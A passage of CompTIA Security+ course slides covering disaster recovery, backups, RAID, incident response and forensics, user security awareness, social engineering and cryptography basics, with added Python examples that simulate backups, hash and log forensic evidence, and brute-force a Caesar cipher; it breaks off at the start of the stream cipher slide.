Business Continuity Planning (BCP) and Testing
Business Impact Analysis
IT Contingency Planning
• Removing Single Points of Failure
Continuity of Operations
Succession Planning
CompTIA Security+ Training Instructor: Lisa Szpunar
Disaster Recovery Planning
CompTIA Security+ Training
Disaster Recovery Planning
In This Lesson:
Disaster Recovery Plan
Service Level Agreement (SLA)
• Mean Time to Restore (MTTR)
• Mean Time Between Failures (MTBF)
• Recovery Time Objectives (RTO)
• Recovery Point Objectives (RPO)
Utilities
In This Lesson:
Backup and Recovery
Backup Types
Backup Plans
Backup Storage Options
Recovering from Backups
Backup and Recovery Considerations
Exam Objective: 2.7 Execute disaster recovery plans and procedures
High Availability
Redundancy
Fault Tolerance
RAID
Load Balancing
Clustering
Alternate/Backup Sites
• Hot, Cold, and Warm Sites
• Scope
– IT backup and recovery procedures
–People
– Locations
• Develop, test, train, maintain, and document
• Who sees the plan?
Disaster Recovery Plan
• Mean Time to Restore (MTTR)
–Also called mean time to repair
–The average time it takes to repair a given component or system
• Mean Time Between Failures (MTBF)
–Estimation of how often an outage will happen
• Recovery Time Objectives (RTO)
–The longest acceptable duration of downtime
–What is the benchmark for what is considered “uptime”?
• Recovery Point Objectives (RPO)
–How much data loss or other loss is acceptable?
–Measured in hours
Service Level Agreement (SLA)
• Power, phones, and internet connectivity can be lost in a disaster
• Single points of failure outside of the company's control
–Know the backup policy for your ISP
• Disaster recovery plans can have provisions for utilities
–Back up generators
Utilities
Backup and Recovery
Backup Types
Backup Type | Description | Archive Bit Cleared?
--- | --- | ---
Full | Backs up all files | Yes
Incremental (also called differential incremental) | Backs up only the files that have changed since last incremental backup | Yes
Differential (also called cumulative incremental) | Backs up the files that have changed since last full backup | No
Copy | A copy of all data | No
Snapshot/Image | Taking a copy of the entire system at a point in time | N/A
• What to backup?
– Databases, email database, user files, etc.
• What method and frequency of backups?
– Full Archival Method
– Grandfather, Father, Son Method (GFS)
– Progressive Paradigm (Incremental Forever)
• How long to retain backups?
• Short-term
• Long-term
• Do not confuse backups with archives
Backup Plans
Backup Plans
Grandfather, Father, Son Method
Figure: Grandfather, Father, Son rotation. Son: weekly sets (Week 1 through Week 5); Father: monthly sets (January through December); Grandfather: yearly sets (2004 through 2010)
• Backup Media
– Tape
– Disk
– Optical
– Online
• Location of Backups
– Secure backup media wherever it is
– Onsite: less expensive, easier, but is not protected against local disasters
– Offsite: more expensive, requires more overhead, but data is protected against local disasters
– Both would be ideal
Backup Storage Options
• Practice the restoration process
–Depending on the backup type you can restore individual files, mailboxes, databases, whole systems, etc.
• Be sure your backups are usable
–Configuration auditing
–Error detection
–Keep old backup hardware
Recovering from Backups
• Backup vs. Backout
–Backup: Used to restore data due to data corruption, data loss, or hardware failure
–Backout: Used to restore back to a previous point
• A way to undo a change that has been made
– Updates, configuration changes, software installs, migrations, and firmware updates
• A good backout policy prepares for this with images, snapshots, or other backups
Recovering from Backups
Examples
Recovering from Backups
Incremental Backups to Tapes
Sun | Mon | Tues | Wed | Thur | Fri | Sat
--- | --- | --- | --- | --- | --- | ---
Full | Inc 1 | Inc 2 | Inc 3 | Inc 4 | Inc 5 | Inc 6
Tapes Needed for Full Restore (through Thursday): Full, Inc 1, Inc 2, Inc 3, Inc 4

Differential Backups to Tapes
Sun | Mon | Tues | Wed | Thur | Fri | Sat
--- | --- | --- | --- | --- | --- | ---
Full | Diff 1 | Diff 2 | Diff 3 | Diff 4 | Diff 5 | Diff 6
Tapes Needed for Full Restore (through Thursday): Full, Diff 4
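The backup-type table and the tape examples above, simulated end to end. This is an added example, not part of the course material: a week of constructed file changes is backed up with a Sunday full followed by daily incrementals or differentials, the archive bit is cleared exactly as the table says, and the restore chain through Thursday comes out as Full plus Inc 1 through Inc 4 in one case and Full plus Diff 4 in the other.

```python
from dataclasses import dataclass, field

DAYS = ["Sun", "Mon", "Tues", "Wed", "Thur", "Fri", "Sat"]

# Constructed file changes for one week: day -> {file name: new content}.
CHANGES = {
    "Sun": {"a.txt": "a0", "b.txt": "b0", "c.txt": "c0"},
    "Mon": {"a.txt": "a1"},
    "Tues": {"b.txt": "b1"},
    "Wed": {},
    "Thur": {"a.txt": "a2", "d.txt": "d0"},
    "Fri": {"c.txt": "c1"},
    "Sat": {"b.txt": "b2"},
}


@dataclass
class Volume:
    files: dict = field(default_factory=dict)
    archive_bit: set = field(default_factory=set)   # files changed since the bit was last cleared

    def write(self, name, content):
        self.files[name] = content
        self.archive_bit.add(name)


@dataclass
class BackupSet:
    kind: str
    label: str
    files: dict


def backup(volume, kind, label):
    """Take one backup of the given kind, applying the archive-bit rules from the table."""
    if kind in ("full", "copy"):
        selected = dict(volume.files)
    elif kind in ("incremental", "differential"):
        selected = {name: volume.files[name] for name in volume.archive_bit}
    else:
        raise ValueError(kind)
    if kind in ("full", "incremental"):      # only these two clear the bit
        volume.archive_bit.clear()
    return BackupSet(kind, label, selected)


def simulate_week(kind):
    """Full on Sunday, then one backup of `kind` each day; returns the sets and the state after each day."""
    volume, sets, states = Volume(), [], {}
    short = {"incremental": "Inc", "differential": "Diff"}[kind]
    for number, day in enumerate(DAYS):
        for name, content in CHANGES[day].items():
            volume.write(name, content)
        if number == 0:
            sets.append(backup(volume, "full", "Full"))
        else:
            sets.append(backup(volume, kind, f"{short} {number}"))
        states[day] = dict(volume.files)
    return sets, states


def restore_chain(sets, upto):
    """Backup sets needed to rebuild the state right after set index `upto`."""
    history = sets[:upto + 1]
    last_full = max(i for i, s in enumerate(history) if s.kind == "full")
    after = history[last_full + 1:]
    if any(s.kind == "incremental" for s in after):
        return [history[last_full]] + [s for s in after if s.kind == "incremental"]
    return [history[last_full]] + after[-1:]   # the latest differential covers the earlier ones


def restore(chain):
    """Apply the sets in order; later sets overwrite earlier versions of a file."""
    files = {}
    for backup_set in chain:
        files.update(backup_set.files)
    return files


if __name__ == "__main__":
    for kind in ("incremental", "differential"):
        sets, states = simulate_week(kind)
        chain = restore_chain(sets, DAYS.index("Thur"))
        print(kind, [s.label for s in chain], restore(chain) == states["Thur"])
```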
Backup Challenges
•Growing amount of data
•Remote office locations
•24 hour business
•Regulatory and legal requirements
Backup and Recovery Best Practices
•Have onsite or online backups for fast recovery
•Keep copies of backups and archives offsite
•Have point-in-time versions in case of accidental changes or deletions
•Include error checking to make sure backups were created correctly
•Continually revisit the organization's backup needs as technology changes
•Do practice recoveries to test your backups
Backup and Recovery Considerations
High Availability (HA)
• Having duplicate systems, devices, or data paths to failover to when a failure occurs
–Redundant servers can be clustered or load balanced
–Can also have redundant hardware like firewalls and routers
• Redundant components and spare parts
• Ensure functionality continues
–Failover is not necessarily automatic; redundancy supplies the spare, and high availability adds the automatic switchover to it
Redundancy
• The ability for a device or system to remain operational in the event of a component failure
–Might have reduced functionality or efficiency
• Redundant hardware components
• Backup power or at least an uninterruptible power supply (UPS)
Fault Tolerance
• Also called redundant array of inexpensive disks
• Using multiple disks to provide fault tolerance and improve performance
RAID: Redundant Array of Independent Disks
RAID Level | Name | Redundant? | Disk failures survived
0 | Disk Striping | No | None (any single disk failure loses the array)
1 | Disk Mirroring | Yes | One
5 | Disk Striping with Distributed Parity | Yes | One
6 | Disk Striping with Dual Parity | Yes | Two
10 (1+0) | Mirrored Stripe Set | Yes | One per mirrored pair
• Distributes computing workload across multiple machines
• If one redundant server goes down the load balancer will compensate (availability)
Load Balancing
Diagram: Clients -> Load Balancer -> Switch -> Redundant Servers
• A team of servers running the same applications or services
• Nodes monitor each other over a heartbeat connection and, in some designs, share the load between them
• When the active node stops answering the heartbeat, the passive node takes over
• More complex clustering has all nodes active at the same time
Clustering
Diagram: Clients -> Primary Node and Secondary Node (heartbeat between them) -> Shared Storage
Alternate/Backup Sites
–Hot site: receives real-time replication of data from the main site and can take over immediately
–Cold site: a location with no systems or data; everything must be rebuilt from backups
–Warm site: some infrastructure and/or data already staged; needs time and effort before it is running
Key Terms You Should Know
Mean Time to Restore (MTTR): The average time required to repair a failed component or device and return it to service (also expanded as mean time to repair)
Mean Time Between Failures (MTBF): The predicted time between failures of a system during operation
Recovery Time Objective (RTO): The maximum time a process may take to be restored after a disruption before the impact on business continuity becomes unacceptable
Recovery Point Objective (RPO): How much data, measured in hours, can be lost; how far back in time it is acceptable to recover to
Backout Plan: The policies and procedures for preparing for and carrying out a backout, that is, rolling a system back to a specific point in time
Key Terms You Should Know
High Availability: The approach and system implementation that ensures a high level of continued operations (uptime). What counts as an acceptable amount of downtime is decided case by case
Redundancy: The duplication of critical components, systems, or functions to increase reliability and uptime
Fault Tolerance: The ability of a system to continue operation, rather than failing completely, when a component fails
Redundant Array of Independent Disks (RAID): Using different configurations of disk drives and their data distribution to improve performance and fault tolerance
Key Terms You Should Know
Clustering: Using a group of linked computers working together to improve performance and availability
Hot Site: A remote location with redundant systems and data that is updated in real time
Cold Site: A remote location that has no data or systems but is available as a contingency location to rebuild systems from backups
Warm Site: A remote location that has some infrastructure and/or data ready but requires some time and human effort before systems are up and running
What We Covered
Disaster Recovery Plan
Service Level Agreement (SLA)
• Mean Time to Restore (MTTR)
• Mean Time Between Failures (MTBF)
• Recovery Time Objectives (RTO)
• Recovery Point Objectives (RPO)
Utilities
What We Covered
Backup and Recovery
Backup Types
Backup Plans
Backup Storage Options
Recovering from Backups
Backup and Recovery Considerations
High Availability
Redundancy
Fault Tolerance
RAID
Load Balancing
Clustering
Alternate/Backup Sites
• Hot, Cold, and Warm Sites
CompTIA Security+ Training Instructor: Lisa Szpunar
Incident Response
CompTIA Security+ Training
Incident Response
In This Lesson:
Exam Objective: 2.3 Execute appropriate incident response procedures
Incident Response Plan
Damage and Loss Control
Chain of Custody
First Responder
Basic Forensic Procedures
• Order of Volatility (OOV)
• Record Time Offset
• Capture System Image
• Document Network Traffic and Logs
• Collect Relevant Backups
• Capture Video
• Take Hashes
• Capture Screenshots
• Interview Witnesses
• Track Man Hours and Expense
• Define what counts as an “incident”
• Policies and procedures
–Response procedures
–Incident response team
–Resources available
–Forensic policies
• Evidence gathering procedures
–Communication
Incident Response Plan
Priority matrix (1 = highest priority); rows are impact, columns are urgency
Impact \ Urgency | High | Med | Low
High | 1 | 2 | 3
Med | 2 | 3 | 4
Low | 3 | 4 | 5
Identify and Report
• Detection
• Confirmation
• Log
Investigate
• Diagnose
• Categorize and Prioritize
• Escalate
• Create Recovery Plan
Resolve/Recover
• Carry Out
• Test
Debrief
• Document
• Lessons Learned
• Make Improvements
• Minimizing loss due to an incident
• Know how many and which systems are affected by the incident
• Disconnect the affected systems from the network, if the incident response policy allows; isolation destroys volatile evidence such as memory contents and active connections, so settle this question in the plan, not during the incident
• Keep critical business functions available
Damage and Loss Control
Forensics
• Maintain the CIA of the evidence
• Imperative for using evidence in a court of law
• Document and label when, where, who, and how each piece of evidence was collected
• Seal in tamper evident bags with evidence tags on the outside
• Log when and who touches or transports any piece of evidence
• Store long term under lock and key
Chain of Custody
• What to do if you are the first person to uncover or respond to an incident
• Assess the situation and contain the incident
–Unplug the affected systems from the network
* If allowed by incident response policies
• Don’t disturb the environment if evidence needs to be collected
–Think about the chain of custody
• Follow the escalation policy
–Who to notify
–What policies and procedures to follow
• Human safety overrides all of the above: if a life is in danger, act on that first
First Responder
• Order of Volatility (OOV)
–Collect the shortest living evidence first
• Record Time Offset
–Note how much time the clock on each affected system is off from the real time
– Important for reconstructing an accurate timeline
• Capture System Images
–Make bit-for-bit duplicates (forensic images) of the affected system and do the analysis on the copy
–Some forensic policies require the original to stay intact (best evidence rule)
Basic Forensic Procedures
• Document Network Traffic and Logs
–Useful to reconstruct the attack
– Look for trends
• Collect Relevant Backups
–Secure any backups created for the affected systems during and before the incident took place
• Capture Video
–Record the state of the physical environment
–While carrying out forensic procedures
Basic Forensic Procedures
• Take Hashes
–A way to know if a file or image has changed
–For example a 128-bit MD5 hash; MD5 collisions are practical today, so record a SHA-256 digest as well (or instead), and hash the image both when it is taken and after analysis
• Capture Screenshots
–Use screen-capture software when working on the duplicate image
–Use a digital camera to photograph the screen of the compromised system itself, so that nothing new is run on it
• Interview Witnesses
–Ask and document (record the interview if possible)
–Sooner rather than later
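The time-offset, hashing and chain-of-custody steps above can be tied together in a small script. This is an added example, not part of the course: the host name, timestamps, evidence bytes and helper names are constructed for it, and the "image" is a short byte string standing in for a disk image.

```python
"""Added example (not part of the original course): record a seized system's
clock offset, hash an evidence image, and append chain-of-custody records so
later handlers can prove the image is unchanged.

The host name, timestamps and evidence bytes are constructed; the helper
names are this example's own."""

import hashlib
import json
from datetime import datetime, timedelta, timezone

# Constructed values: trusted (NTP) time at seizure, the time the suspect
# host's own clock showed at that moment, and a stand-in for its disk image.
REF = datetime(2024, 3, 1, 14, 0, 0, tzinfo=timezone.utc)
SYS_CLOCK = datetime(2024, 3, 1, 14, 7, 30, tzinfo=timezone.utc)
IMAGE = b"constructed-disk-image-bytes-from-host-ws042"


def record_time_offset(system_clock, reference_clock):
    """Offset in seconds (system minus reference); positive means the suspect
    system's clock runs fast. Note it in the case file before reading logs."""
    return (system_clock - reference_clock).total_seconds()


def normalise(system_timestamp, offset_seconds):
    """Convert a timestamp read from the suspect system into reference time,
    so events from different hosts line up on one timeline."""
    return system_timestamp - timedelta(seconds=offset_seconds)


def hash_evidence(data):
    """MD5 (what the slide and many older tools report) and SHA-256 (collision
    resistant; the digest to rely on)."""
    return {"md5": hashlib.md5(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest()}


def custody_entry(evidence_id, data, action, handler, when):
    """One chain-of-custody record: who did what to which item, when, and the
    digests of the item at that moment."""
    entry = {"evidence_id": evidence_id, "action": action,
             "handler": handler, "timestamp_utc": when.isoformat()}
    entry.update(hash_evidence(data))
    return entry


def verify_unchanged(chain, data):
    """True only if every record in the chain carries the image's current SHA-256."""
    current = hashlib.sha256(data).hexdigest()
    return bool(chain) and all(e["sha256"] == current for e in chain)


if __name__ == "__main__":
    offset = record_time_offset(SYS_CLOCK, REF)          # 450.0: host is 7.5 min fast
    log_time = datetime(2024, 3, 1, 13, 55, 0, tzinfo=timezone.utc)  # as read from host log
    print("event really happened at", normalise(log_time, offset))
    chain = [custody_entry("EV-001", IMAGE, "imaged", "analyst A", REF),
             custody_entry("EV-001", IMAGE, "transferred to lab", "analyst B",
                           REF + timedelta(hours=2))]
    print(json.dumps(chain, indent=2))
    print("intact:", verify_unchanged(chain, IMAGE))
    print("tampered:", verify_unchanged(chain, IMAGE + b"!"))
```

Every custody record carries the digests, so a later handler can re-hash the image and show it matches what the first responder recorded; a single changed byte fails `verify_unchanged`.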
• Track Man Hours and Expense
–Keep track of how much an incident cost to investigate and resolve
–Document the time each step takes and the cost of all resources used
• Document everything and maintain the chain of custody
Basic Forensic Procedures
Key Terms You Should Know
First Responder: In IT incident response, the first person to discover or respond to an incident; attempts to contain the incident and notifies the proper personnel
Chain of Custody: Detailed documentation about the gathering, custody, transfer, analysis, and disposal of evidence
Order of Volatility: In IT incident response, the information that will disappear soonest (such as RAM) should be gathered before less volatile information
What We Covered
Incident Response Plan
Damage and Loss Control
Chain of Custody
First Responder
Basic Forensic Procedures
• Order of Volatility (OOV)
• Record Time Offset
• Capture System Image
• Document Network Traffic and Logs
• Collect Relevant Backups
• Capture Video
• Take Hashes
• Capture Screenshots
• Interview Witnesses
• Track Man Hours and Expense
CompTIA Security+ Training Instructor: Lisa Szpunar
User Education
CompTIA Security+ Training
User Education
In This Lesson:
Security Policy Training and Procedures
• Compliance with Laws, Best Practices, and Standards
Threat Awareness
• New Viruses
• Phishing Attacks
• Zero Day Exploits
Regulatory Compliance
Personally Identifiable Information
Social Networking
Peer to Peer (P2P) File Sharing
In This Lesson:
Exam Objective: 2.4 Explain the importance of security related awareness and training
User Habits
• Password Behaviors
• Data Handling
• Clean Desk Policies
• Personally Owned Devices
Information Classification
Data Labeling, Handling, and Disposal
• Compliance with laws, best practices, and standards
• Communication and awareness
• Communicate the importance and rationale for the policies
• Foster user acceptance and buy-in
• Get feedback on user experience and concerns
• Education and training
–Expectations for behavior
–Types: On-the-job, mandatory meetings, classroom, online, CBT
Security Policy Training and Procedures
• Keep informed of the latest threats
–Zero day exploits
• Communicate with users about current threat topics
–Monthly email
–SharePoint
• Topics include:
–Phishing attacks – remind users to not click on links in emails or IMs
–Social engineering tactics
–New viruses and zero day exploits – remind users to keep their home computers patched and up to date
Threat Awareness
• HIPAA: Health Insurance Portability and Accountability Act
–Health care providers, health plans, and their business associates must keep patients’ health information secure
• PCI DSS: Payment Card Industry Data Security Standard
–Designed to ensure that all companies that process, store, or transmit credit card information maintain a secure environment
• SOX: Sarbanes-Oxley Act
–Mandates strict reporting requirements and internal controls of financial information
Regulatory Compliance
• GLBA: Gramm-Leach-Bliley Act
–Requires banks and financial institutions to communicate their privacy policies about disclosing customer information
• FERPA: Family Educational Rights and Privacy Act
–Student education records cannot be disclosed without the student's permission
–A student must be given access to their own records on request
Regulatory Compliance
• Information that can be used to identify an individual
–Social Security number, birth date, address, biometric info
• Information linked to an individual
–Medical records, financial information, employee file
• Which PII is protected, and how it must be handled, is defined in the company's privacy policy and the regulations that apply to it
Personally Identifiable Information (PII)
• Users must safeguard customer and employee PII against identity theft
• Educate users on
–Regulatory policies and procedures concerning PII
–Examples of PII breaches in the news
–The latest scams that target PII to be aware of
Personally Identifiable Information (PII)
• Users should not post sensitive company information on social networking sites
• Malware, XSRF, phishing, and other attacks are common on social networking sites
• Shortened URLs can lead anywhere
Social Networking
• Ban and disable on company devices
• Train users on the dangers of personal use
• Why?
–Music and other file sharing sites are rife with malware downloads
–Pirated software is not allowed on company assets
–An avenue for data breaches
• Accidently or by malicious insiders
Peer to Peer (P2P) File Sharing
• Password behaviors
–Don’t use dictionary words or anything associated with the user
–Don’t use the same password for multiple accounts
• Clean desk policies
–Employees are responsible for clearing their workspace of sensitive papers when they leave the office
–Have a clearly stated policy that users read and sign
User Habits
• Data handling
–Encrypt data before emailing, putting on removable media, or using unsecured file transfer protocols
–Store files in the appropriate place on the network
–Take care that only authorized people see printouts and faxes
–Properly label and dispose of data
–Don’t share credentials or ID badges with anyone
• Safe computing
–Connecting to wireless networks
–Being aware of spoofing and phishing
–Downloading files and attachments
User Habits
• Personally owned devices
–The most secure method would be to not allow personal devices
• Proprietary data can be leaked
• Malware can be introduced
– If devices are allowed the acceptable use policy needs to clearly spell out rules and restrictions
• Extensive awareness training needs to be done
• Couple with data loss prevention (DLP) systems and other security controls
User Habits
• Sensitivity of data
–Some data is more sensitive than other data
–Hard copy (paper) vs. soft copy (electronic)
–Use different classifications to label data sensitivity levels
• Government: Unclassified, Sensitive, Confidential, Secret, Top Secret
• Public, Internal, Confidential, Secret
• Data availability classifications
– Labels can also be created based on how imperative data is to critical business functions
Information Classification
Information Classification
Information Security Scheme
• Examples
Criterion | Public | Internal | Confidential | Secret
Viewable By | Everyone | Select Employees | Select Employees | Select Leadership
Data Integrity | Desired | Required | Required | Vital
Impact of Disclosure | Acceptable | Inconvenience | Damaging | Catastrophic
Impact of Loss | Acceptable | Inconvenience | Damaging | Catastrophic
Value to Competitor | Minimal | Interesting | Significant Gain | Significant Gain
Information Classification
Information Availability Scheme
• Examples
Criterion | Nice to Have | Important | Very Important | Mission Critical
Tolerable Downtime | 1 Week | 2 Days | 8 Hours | 1 Hour
Hours of Operation | N/A | 6 am – 6 pm | 6 am – 6 pm | 24h x 7d
% Available | 70% | 85% | 95% | 99.99%
• Labeling
–Clearly label data media used for backup, archival, and transport
• Handling
–Have a clean desk policy and other policies for hard-copy data
–Users should not share their credentials
• Disposal
–Decommissioning devices
• What is data and information on the device worth?
• Physically destroy
–Deleting old data
• Secure wipe using a specialized utility (overwrite or cryptographic erase; an ordinary delete leaves the data recoverable)
–Shred paper copies
Data Labeling, Handling, and Disposal
Key Terms You Should Know
Personally Identifiable Information (PII): Information that can be used to identify a person or be linked to a person
Clean Desk Policy: A policy that states that employees must have their workspace cleared of any sensitive company information before leaving the office
Peer to Peer (P2P) File Sharing: Clients share files through an interconnected network of nodes with no centralized server
What We Covered
Security Policy Training and Procedures
• Compliance with Laws, Best Practices, and Standards
Threat Awareness
• New Viruses
• Phishing Attacks
• Zero Day Exploits
Regulatory Compliance
Personally Identifiable Information
Social Networking
Peer to Peer (P2P) File Sharing
What We Covered
User Habits
• Password Behaviors
• Data Handling
• Clean Desk Policies
• Personally Owned Devices
Information Classification
Data Labeling, Handling, and Disposal
CompTIA Security+ Training Instructor: Lisa Szpunar
Social Engineering
CompTIA Security+ Training
Social Engineering
In This Lesson:
Exam Objective: 3.3 Analyze and differentiate among
types of social engineering attacks
Social Engineering Overview
Impersonation
Tailgating
Dumpster Diving
Shoulder Surfing
Phishing
• Vishing
• Spear Phishing
• Whaling
Hoaxes
Reverse Social Engineering
• Manipulating people into performing actions or divulging information
• Varied techniques used by attackers
–Both technical and non-technical
• Technical controls are useless if users can be convinced to bypass them for attackers
Social Engineering Overview
• Why social engineering works
– Fear
– Laziness
–Desire to obtain free awards or money offered
–Wanting to be helpful
–Flattery or distraction
– Lack of awareness
Awareness and education
• Policies and procedures
• Mandatory training
• Continued follow-up
Social Engineering Overview
• On the phone
– Fellow employee or the boss
–Authority figure like a fire marshal
–Survey taker
–Customer
Define what information should never be told over the phone
• In person
–Maintenance person
–Delivery person
Train users to check credentials and verify that all outside people are allowed to enter. Escort non-employees while in the building
Impersonation
Tailgating
• A person follows someone past a security checkpoint without using their own credentials
• Also called piggybacking
–Piggybacking is sometimes used for the case where the authorized person knowingly lets the other through; tailgating is done without their knowledge or consent
• Methods
–Confidently following the authorized person past the door after they have swiped in
–Blending in with a large crowd
–Having full hands so that someone will hold open the door
–Convincing an authorized person that the unauthorized person has forgotten or lost their ID
Train employees to insist that every person authenticates
Tailgating
Dumpster Diving
• Someone looking through the trash or recycling to gain information
–Passwords
–Details an “insider” would know to use in future attacks
• Have a proper disposal policy
–Third-party disposal companies are available to securely throw away or recycle trash
Train users to follow the paper shredding and media/equipment disposal policy
Shoulder Surfing
• Directly observing unauthorized information
–Password
–PIN
• Attacker must have physical access
• Eavesdropping
– Listening in on a conversation to gain information
• Snooping
– Looking through files and papers to gain information
– Looking under your keyboard or other obvious places for passwords
Train employees to be aware of their surroundings
• Trying to get personal information by pretending to be a trusted person, company, or website
• Often comes as email
–Reply to email with personal info
–Click on a link
–Call “customer service” representative on the phone
• Uses logos and color schemes to try to mimic the legitimate entity
• Tries to create a sense of urgency or fear
Train users to never follow instructions in an email without verifying that it isn't a scam first
Phishing
Phishing Example
• Sub-types of phishing
–Spear Phishing: Using information specific to a person or company to make a phishing attempt seem more legitimate
–Whaling: Spear phishing targeted at executives or people with access to especially sensitive information
–Vishing: Phishing by telephone (voice), often over VoIP with a spoofed caller ID
Phishing
• Chain emails or social media posts that contain misinformation
• Wastes time and resources
–Lost productivity
–Email database space and backups
–Paper printouts
• Concerned and frightened users will notify IT staff
• Stay abreast of current hoaxes
• Use spam filters to keep hoax emails from reaching users
Train users on how to check whether an email is a hoax
• Snopes
• Antimalware vendors
Hoaxes
• The attacker makes themselves interesting or available to the victim
–Most common example is offering help for a future problem
• The victim contacts the attacker and readily offers information
–The victim calls or emails the “helper” to ask for help to fix a problem
• Other social engineering methods or reconnaissance are done first to set up for the reverse attack
Train users to verify that anyone that offers help does in fact work for the company
Reverse Social Engineering
Key Terms You Should Know
Social Engineering: Deceiving a person into revealing confidential information or performing a task
Impersonation: In social engineering, the attacker pretends to be someone who is authorized
Tailgating: A person follows an authorized person through a security checkpoint (like a door with a card reader) without authenticating themselves
Dumpster Diving: Looking through trash for details about an organization
Key Terms You Should Know
Shoulder Surfing: Observing confidential information, like a password being typed in
Hoaxes: Misinformation that leads to wasted time and resources; normally arrives as email or social media posts
Reverse Social Engineering: The victim is lured into contacting the attacker, which gives the attacker a higher level of trust; normally done by offering help or gifts
What We Covered
Social Engineering Overview
Impersonation
Tailgating
Dumpster Diving
Shoulder Surfing
Phishing
• Vishing
• Spear Phishing
• Whaling
Hoaxes
Reverse Social Engineering
CompTIA Security+ Training Instructor: Lisa Szpunar
Cryptography Concepts
CompTIA Security+ Training
Cryptography Concepts
In This Lesson:
Exam Objective: 6.1 Summarize general cryptography concepts
Cryptography Overview
Symmetric vs. Asymmetric Encryption
Digital Signatures
Non-repudiation
Encryption/Decryption Methods
• Block Cipher
• Stream Cipher
• Elliptic Curve Cryptography (ECC)
• Quantum Cryptography
Cryptographic Hashing
Transport Encryption
Steganography
Use of Proven Technologies
• What is Cryptography?
–The science and study of hiding information
• Hiding information by converting plaintext into ciphertext (encryption)
• Then back from ciphertext to plaintext (decryption)
Cryptography Overview
Diagram: Plaintext -> Encryption Algorithm (with key) -> Ciphertext -> Decryption Algorithm (with key) -> Plaintext
Sample plaintext: “If you can dream and not make dreams your master; If you can think and not make thoughts your aim, If you can meet with Triumph and Disaster And treat those two impostors just the same: If you can”
Sample ciphertext (hex): ec40619a9ebccd6ce2b5ef1a256e03eb697aaa34aad84ae9d0fff1817e9a7bddab3a5c8083dcf449bf53b8f14c5f05006576a223b26b36372619e249509d1413504fd67d878ee3e323cfdede6f2e41
• Benefits of cryptography
–Confidentiality
• Protecting data in transit
• Protecting data at rest
–Non-repudiation and authentication
• A message signed with your private key (or, in textbook RSA terms, encrypted with it) can only have been produced by the holder of that key
Cryptography Overview
• Benefits of cryptography
–Access control
• With symmetric encryption only the secret key holder can decrypt the ciphertext
• With asymmetric encryption a digital certificate can be used for authentication and thus access control
– Integrity
• Message digests can be used to know if a message was tampered with during transit
Cryptography Overview
• How cryptography works
–A cipher and a key(s)
• An algorithm encrypts data by applying a key to plaintext
• Another algorithm decrypts data by applying a key to ciphertext
–Some ciphers/algorithms are stronger than others
–For a given algorithm, longer keys make brute force more expensive
• A 40-bit key is not secure: its 2^40 possible keys can be tried exhaustively on ordinary hardware
• Classic ciphers
–Substitution ciphers
–Transposition ciphers
Cryptography Overview
Substitution Cipher Example
Plain:  A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Cipher: G H I J K L M N O P Q R S T U V W X Y Z A B C D E F
ROT6 Caesar Substitution Cipher (each letter shifted six places)
Plaintext: asparagus
Ciphertext: gyvgxgmay
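The ROT6 example above, together with the brute-force weakness the lesson mentions for short keys, as an added Python example that is not from the course. The word list used as a stand-in dictionary is an assumption of the example.

```python
"""Added example (not from the original course): the slide's ROT6 Caesar
substitution cipher, and the brute-force attack that breaks it.

A Caesar cipher's entire key space is 25 useful shifts, so an attacker simply
tries them all and keeps the candidate that looks like language. The word list
below is a constructed stand-in for a dictionary."""

import string

ALPHABET = string.ascii_lowercase


def rot(text, shift):
    """Shift every letter `shift` places (ROT6 for the slide); non-letters and
    case are preserved. Negative shifts rotate the other way."""
    shift %= 26
    shifted = ALPHABET[shift:] + ALPHABET[:shift]
    table = str.maketrans(ALPHABET + ALPHABET.upper(), shifted + shifted.upper())
    return text.translate(table)


def decrypt(ciphertext, shift):
    """Undo rot(): shift the same number of places in the opposite direction."""
    return rot(ciphertext, -shift)


def brute_force(ciphertext, known_words):
    """Try every non-trivial shift; return (shift, plaintext) for the first
    candidate containing a known word, or None if nothing matched.

    This is the whole attack: with 25 keys there is nothing to search cleverly.
    """
    for shift in range(1, 26):
        candidate = decrypt(ciphertext, shift)
        if any(word in candidate.lower() for word in known_words):
            return shift, candidate
    return None


if __name__ == "__main__":
    ciphertext = rot("asparagus", 6)
    print(ciphertext)                                   # gyvgxgmay, as on the slide
    print(brute_force(ciphertext, {"asparagus", "the", "and"}))
    print(rot("Attack at dawn!", 13), "->", decrypt(rot("Attack at dawn!", 13), 13))
```

`brute_force` is what "vulnerable to brute force" means in concrete terms: the key space, not the cleverness of the substitution, decides how long the attacker works.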
• Symmetric Encryption
–The same secret key is used for encryption and decryption
• Key management is the biggest concern
– Getting the secret key securely to both parties
– Keeping the key a secret
–Generally faster than asymmetric encryption alone
–Strength is affected by
• Length of the key
• Number of rounds (iterations) through the algorithm
–The generic attack is brute force over the key space, so the key length sets the attacker's cost
Symmetric vs. Asymmetric Encryption
• Asymmetric Encryption
–A key pair is used: one key is used for encryption and the other for decryption
• Public key is publicly available
• Private key must be kept secret
–Either key can encrypt and either key can decrypt
• Encrypt with public decrypt with private
• Encrypt with private decrypt with public
• Messages encrypted with private cannot be decrypted with private
• Messages encrypted with public cannot be decrypted with public
Symmetric vs. Asymmetric Encryption
• Digitally sign data and messages
• Provides authenticity, non-repudiation, and integrity
• Confirms that the data or message you have received is from who it says it is from
• Confirms that the message was not altered during transit
Digital Signatures
–Assuring that the author of a message cannot later deny having sent that message
–Extra non-repudiation services can be built in to encryption and digital signatures
• Proof of origin
• Proof that the data has been received and received correctly
–Does not account for unauthorized physical access
• Sending a message from someone else’s computer
Non-repudiation
• Block cipher
–Fixed length chunks of bits (blocks) are encrypted
–Blocks can be padded if the data is too short
–Result is the same sized blocks of ciphertext
–A mode of operation with a unique initialization vector (IV) per message lets one key safely encrypt many messages; without one (ECB mode) identical plaintext blocks produce identical ciphertext blocks, which leaks structure
–A good block cipher does not allow someone to deduce the key from looking at the ciphertext
Encryption/Decryption Methods
Diagram: Plaintext blocks -> Block Cipher (with secret key) -> same-sized ciphertext blocks
Sample plaintext blocks: “If you can dream and not make dreams your master; If you can think and not make thoughts your aim, If you can meet with Triumph and Disaster And treat those two impostors just the same: If you can bear to hear the truth you've spoken Twisted by knaves to make a trap for fools, Or watch the”
Sample ciphertext blocks (hex): 03bab3582044427ecc114c9601acc97814c63096338f76e8b290c8662c9f9d7451270bd8bcfc2ace029a7f 4293922215717bfc2f6c0fffab1fb0e85a7826d2a1d1bc19e818c420b9502e59ace94bc5e3fc1f230ed90012 22945c54ec8bad1f6e292c3c1bbef4df8035ed22e8a64be498ad30302c741f79d56af4f70acf90ccd80200eb
• Stream cipher
